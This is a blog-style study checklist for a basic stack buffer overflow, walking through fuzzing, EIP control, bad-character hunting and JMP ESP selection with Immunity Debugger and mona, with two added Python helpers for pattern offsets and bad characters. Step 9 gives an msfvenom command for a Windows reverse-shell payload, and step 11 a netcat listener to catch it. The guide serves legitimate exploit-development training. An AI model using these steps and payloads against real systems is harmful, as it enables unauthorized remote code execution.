Basic Buffer Overflow

troy10101
3 min readJul 3, 2021

Introduction

While learning basic buffer overflows I found it very difficult to grasp; it seemed overwhelming. I iterated on the topic for a week or so and finally understood. I followed guidance from @0xTib3rius, @thecybermentor and @LiveOverflow among countless others. All have covered this topic in great detail. This writing is a combination of their teachings and my learning, written as a “checklist”. I made this for myself as an aid/study guide. Hope you find it useful!

Adding this to the “Yay.. I finally get it” pile of BOF write ups and walkthroughs.

Resources

Videos I used to learn basic stack BOF

Tib3rius: Stack Based BOF: https://youtu.be/1X2JGF_9JGM
The Cyber Mentor: BOF Made Easy: https://youtu.be/qSnPayW6F7U
The Cyber Mentor: Brainpan THM WT: https://youtu.be/T1-Sds8ZHBU
LiveOverflow: https://www.youtube.com/c/LiveOverflowCTF/videos

Scripts used can be found here:
Tib3rius: buffer-overflows.rst: https://github.com/Tib3rius/Pentest-Cheatsheets/blob/master/exploits/buffer-overflows.rst

Action

This assumes you have found the vulnerable application and know how to connect to it locally and remotely. It also assumes you have copied the app to your local machine running Immunity Debugger.

1. Load the app in Immunity Debugger

2. Tell Immunity where to store mona’s working data
— !mona config -set workingfolder c:\mona\%p

3. Run the app in Immunity

4. Fuzz the app from the attacking machine using fuzz.py

5. Make note of the crash point (the number of bytes sent when the app crashed; you need it for cyclic pattern creation)

6. Obtain and verify EIP control with a cyclic pattern
Create a cyclic pattern with the Metasploit framework:
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l <number of bytes fuzzed>
— Copy the created cyclic pattern to the payload of exploit.py
Reload and restart the app in Immunity Debugger
Run exploit.py
Use mona to find EIP
— !mona findmsp -distance <number of bytes fuzzed>
— Look for and make note of the EIP offset
— Copy the offset found with mona to the offset string in exploit.py
— Set the payload to “”
— Set the retn to “BBBB”
— Reload the app in Immunity
— Send exploit.py
— EIP should be overwritten with 42424242 (the hex of BBBB)
— If EIP is overwritten, continue. If not, start over: you don't have control of EIP
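What pattern_create.rb and `!mona findmsp` actually compute is small enough to show in full. The added example below is not from the original post or from the Tib3rius scripts it links; it builds the same Aa0Aa1… cyclic pattern, and recovers the byte offset from the value seen in EIP. The endianness handling is the point of the example: x86 is little-endian, so the four pattern bytes appear reversed in the register, and the same `struct.pack("<I", …)` that reverses them is what turns an address like 625011AF into \xAF\x11\x50\x62 later in the checklist. The EIP value used in the test is constructed from the pattern itself, not taken from a real crash.

```python
import struct
from typing import Optional

UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGITS = "0123456789"


def pattern_create(length: int) -> bytes:
    """Metasploit-style cyclic pattern: Aa0Aa1Aa2...Aa9Ab0Ab1..., cut to `length`.

    Every 4-byte window is unique within the first 26*26*10*3 = 20280 bytes,
    so the 4 bytes that land in EIP identify exactly where in the buffer
    they came from.
    """
    chunks = []
    for u in UPPER:
        for l in LOWER:
            for d in DIGITS:
                chunks.append(u + l + d)
                if len(chunks) * 3 >= length:
                    return "".join(chunks).encode()[:length]
    return "".join(chunks).encode()[:length]


def pattern_offset(eip_value: int, length: int) -> Optional[int]:
    """Offset of the 4 bytes that overwrote EIP, or None if not in the pattern.

    The debugger shows EIP as a 32-bit number. On little-endian x86 the
    lowest-addressed byte of the buffer is the LEAST significant byte of
    that number, so '<I' packing restores the order the bytes had in memory.
    """
    needle = struct.pack("<I", eip_value)
    idx = pattern_create(length).find(needle)
    return idx if idx >= 0 else None


def pack_address(addr: int) -> bytes:
    """Little-endian encoding of a 32-bit address, e.g. 0x625011AF -> AF 11 50 62."""
    return struct.pack("<I", addr)


if __name__ == "__main__":
    # Constructed crash value: the 4 bytes at offset 5 of the pattern ("1Aa2")
    # read as a little-endian integer, i.e. what the EIP column would display.
    fake_eip = struct.unpack("<I", pattern_create(100)[5:9])[0]
    print(hex(fake_eip), "->", "offset", pattern_offset(fake_eip, 100))
    print(pack_address(0x625011AF).hex(" "))
```

If `pattern_offset` returns None for the value you read, the bytes in EIP did not come from your pattern (a wrong length, or a mangled copy of the pattern), which is the "start over" branch of step 6.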

7. Find bad characters
Generate a byte array using mona
— !mona bytearray -b “\x00”
— — make note of where bytearray.bin is stored for comparing later
Generate a string of bad characters
— run badchars.py
— copy the output to the payload of exploit.py
— reload/start the app in Immunity
— send exploit.py
— make note of the ESP address (right click > copy address)
— use mona to compare the badchar payload to the mona byte array
— — !mona compare -f C:\mona\oscp\bytearray.bin -a (ESP address)
— Add the bytes mona reports (besides \x00, which we already excluded) to a NEW mona byte array; these are the badchars
— — For each bad character found with mona compare, add it to the NEW mona byte array, one at a time
— — — !mona bytearray -b “\x00(newbadchar)”
— — — edit the payload of exploit.py to remove the found badchars one by one
— — — restart the app in Immunity
— — — send exploit.py
— — — compare the byte array
— — — — !mona compare -f C:\mona\oscp\bytearray.bin -a (ESP address)
— — — repeat until all bad chars are found and the compare status reads “Unmodified”
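The reason step 7 is a loop, one character at a time, is that only the first mismatch in a compare is trustworthy: once the application drops, replaces or truncates at a bad byte, every byte after it shifts and would be reported as "modified" too. The added example below is not from the original post or the linked scripts. It rebuilds the 0x01..0xff byte array that `!mona bytearray` writes, compares it against what supposedly landed at ESP the way `!mona compare` does, and drives the same iterate-until-Unmodified loop. The target is a constructed stand-in (`simulated_target`) that pretends the app strips \x0a and truncates at \x0d; there is no real application behind it.

```python
from typing import Callable, Optional


def byte_array(exclude: bytes = b"\x00") -> bytes:
    """Every byte value 0x00..0xff except the ones in `exclude`.

    \x00 is excluded by default because it terminates C strings; this is the
    same content `!mona bytearray -b "\x00..."` writes to bytearray.bin.
    """
    return bytes(b for b in range(256) if b not in exclude)


def first_bad_char(expected: bytes, memory: bytes) -> Optional[int]:
    """Compare what we sent with what landed in memory.

    Returns the first byte value that differs (or that is missing because the
    copy was truncated), or None when the copy is 'Unmodified'. Only the FIRST
    mismatch is reported: everything after a mangled byte is shifted and
    would give false positives.
    """
    for i, b in enumerate(expected):
        if i >= len(memory) or memory[i] != b:
            return b
    return None


def simulated_target(payload: bytes) -> bytes:
    """CONSTRUCTED stand-in for reading memory at ESP in the debugger.

    Pretends the application truncates input at \x0d and drops \x0a, which
    is the kind of behaviour that makes those two classic bad characters.
    """
    payload = payload.split(b"\x0d")[0]
    return payload.replace(b"\x0a", b"")


def find_all_bad_chars(read_memory: Callable[[bytes], bytes],
                       known: bytes = b"\x00") -> bytes:
    """Repeat send -> compare -> add one bad char until the compare is clean."""
    bad = bytearray(known)
    while True:
        sent = byte_array(bytes(bad))
        mismatch = first_bad_char(sent, read_memory(sent))
        if mismatch is None:          # compare status "Unmodified"
            return bytes(bad)
        bad.append(mismatch)          # new badchar, regenerate and go again


if __name__ == "__main__":
    found = find_all_bad_chars(simulated_target)
    print("bad chars:", " ".join(f"\\x{b:02x}" for b in found))
```

Because the array is sent in ascending order, bad characters are discovered lowest value first; with the constructed target the loop needs three rounds and ends with \x00 \x0a \x0d, mirroring the repeated `!mona compare` runs in the checklist.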

8. Find the jump (JMP ESP) points that don't contain bad characters
— !mona jmp -r esp -cpb “\x(BAD CHARS LIST)”
— choose an address
— copy the address to the exploit.py retn (overwrite BBBB)
— — Make note of the system architecture: if it is little-endian (x86), enter the address byte-reversed, with \x before each byte (two hex characters), e.g. 625011AF becomes \xAF\x11\x50\x62 in little-endian

9. Generate the payload with msfvenom
— msfvenom -p windows/shell_reverse_tcp LHOST=(*YOUR IP*) LPORT=4444 EXITFUNC=thread -b “\x(all bad chars found)” -f c
— Copy the resulting C code output to the payload of exploit.py (do not include the semicolon or anything other than the hex)

10. Prepend NOPs to give the encoded payload run time and memory space to unpack itself
— Edit the exploit.py padding like this: padding = “\x90” * 16 (NOTE: the sled can be greater than 16)

11. Exploit
— Start a netcat listener on the port chosen in the payload
— Restart/reload the app in the live environment
— Run exploit.py and hope for the best!

troy10101

Computer science, Cyber/InfoSec enthusiast. Wanna-be hacker.